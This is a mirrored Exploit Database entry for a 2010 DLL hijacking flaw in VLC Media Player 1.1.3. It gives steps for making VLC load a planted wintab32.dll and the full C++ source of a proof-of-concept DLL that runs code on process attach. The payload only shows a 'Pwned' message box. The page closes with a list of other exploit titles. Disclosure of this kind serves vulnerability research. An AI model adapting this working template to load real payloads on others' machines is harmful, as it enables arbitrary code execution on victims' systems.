VideoLAN VLC Media Player 1.1.3 – ‘wintab32.dll’ DLL Hijacking

Exploit Database
17 阅读

作者： Secfence

日期： 2010-08-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/14750/

Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC
Tested on: Windows XP

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
 DWORDul_reason_for_call,
 LPVOID lpReserved
 )
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

/*----------*/


Exploit By:
Vinay Katoch
www.secfence.com

last Exploits
VideoLAN VLC Media Player 1.1.3 – ‘wintab32.dll’ DLL Hijacking的更多信息

Apple Mac OSX Install.Framework – SUID Root Runner Binary Privilege Escalation：
VMware Host Guest Client Redirector – DLL Side Loading (Metasploit)：
Sandboxie-Plus 5.50.2 – ‘Service SbieSvc’ Unquoted Service Path：
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure：
VariCAD 2010-2.05 EN – ‘.DWB’ Local Stack Buffer Overflow (Metasploit)：
Free MP3 CD Ripper 2.6 – ‘.mp3’ Buffer Overflow (SEH)：
Bluetooth Application 5.4.277 – ‘BlueSoleilCS’ Unquoted Service Path：
AudioTran 1.4.2.4 – SafeSEH + SEHOP：